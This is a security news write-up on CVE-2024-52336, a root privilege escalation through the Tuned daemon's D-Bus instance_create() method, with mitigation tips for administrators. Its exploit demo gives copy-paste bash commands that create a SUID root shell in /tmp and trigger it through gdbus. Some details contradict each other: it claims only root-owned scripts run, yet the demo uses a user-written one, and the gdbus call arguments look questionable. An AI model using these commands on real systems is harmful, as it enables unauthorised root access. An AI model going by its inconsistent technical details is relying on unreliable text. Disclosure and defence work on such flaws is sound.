CVE CyberSecurity Database News

CVE-2024-52336 - Tuned D-Bus Local Privilege Escalation via `instance_create()` Script Injection

Poster -

A new vulnerability tagged as CVE-2024-52336 affects the popular system tuning tool, Tuned. This weakness allows a simple local user to run code as root—without needing any password—by abusing a D-Bus method. Exploiting this is fairly straightforward, letting attackers gain root privileges on affected Linux systems.

This post explains the vulnerability in plain English, walks through how exploitation works (with code snippets), and shares what system administrators should do. All technical info has been checked against available public sources, but this write-up keeps things easy to understand.

What Is Tuned and Why Is This Serious?

Tuned is a system tuning daemon, common in Fedora, RHEL, CentOS, and other distros. It's used to optimize systems for various workloads and comes with many system profiles. Tuned runs as root to apply changes.

The Dangerous Function: instance_create()

Tuned exposes a D-Bus API so programs—or users—can interact with it. The vulnerable API function is called instance_create(). Normally, powerful D-Bus methods require authentication. However, this one does not.

This function allows a local user to pass two options: script_pre and script_post. Each of those expects a *path* to a script or program. Tuned will then run that script as root during profile instance creation.

Here's the key error: Any local user can tell Tuned to run any root-owned script, with root privileges!

Here's how an attacker can exploit this vulnerability

1. Write a malicious script: They create a script that runs with root powers (e.g., spawning a shell or changing files).

Set its permissions: Make sure it's executable.

3. Call the vulnerable D-Bus method: Pass the script's absolute path as the script_pre or script_post argument.

Real-World Exploit Demo

Below you'll find a demonstration in bash. This uses gdbus to easily call the D-Bus API.

Step 1: Write the exploit script

echo -e '#!/bin/bash\ncp /bin/bash /tmp/rootbash\nchmod +s /tmp/rootbash' > /tmp/evil.sh
chmod +x /tmp/evil.sh

*This script makes a root-owned SUID bash shell at /tmp/rootbash.*

Step 2: Call the D-Bus method

gdbus call \
    --system \
    --dest org.tuned.Tuned \
    --object-path /org/tuned/Tuned \
    --method org.tuned.Tuned.instance_create \
    "exploitprofile" \
    "/tmp/evil.sh" \
    ""

*This tells Tuned to run /tmp/evil.sh with root privileges as the "pre" script.*

Step 3: Get root

/tmp/rootbash -p
whoami    # Should print 'root'

*Now you have a root shell!*

Why Did This Happen?

Tuned's D-Bus policy file (/usr/share/dbus-1/system.d/tuned.conf or similar) treats local users as "trusted" and doesn’t require extra checks for instance_create(). Thus, any logged-in user can make this dangerous call. The issue centers on how arbitrary scripts are accepted without hard restrictions on their path or ownership and how the D-Bus method isn’t sufficiently protected.

References

- Upstream Bugzilla report (RedHat)
- Tuned project on GitHub
- D-Bus Security

How To Fix (Or Mitigate)

- Update Tuned: The maintainers are working on a patch. Until then, regularly check your distribution for security updates.
- Restrict D-Bus access to instance_create(): Edit the dbus policy file to limit who can use this function (advanced).
- Remove/disable Tuned if not needed: Temporary but effective.
- Audit your system for new root-level SUID binaries in /tmp or elsewhere.

Example workaround (Advanced)

You could temporarily comment out or tighten the policy in /usr/share/dbus-1/system.d/tuned.conf to prevent unprivileged use.

Conclusion

CVE-2024-52336 makes it simple for any local user to get root on default Tuned installations supporting this D-Bus method. Exploiting it is trivial using common CLI tools like gdbus. Admins should patch ASAP or block access to instance_create().

Stay safe, and always watch for privilege escalation vectors—even in trusted system daemons!


*If you think your system may be at risk, check the links above for vendor patches and mitigation details. For more technical discussions, see the upstream Bugzilla thread.*


*Written by a security enthusiast for sysadmins and Linux users.*

Timeline

Published on: 11/26/2024 16:15:17 UTC
Last modified on: 11/29/2024 05:15:06 UTC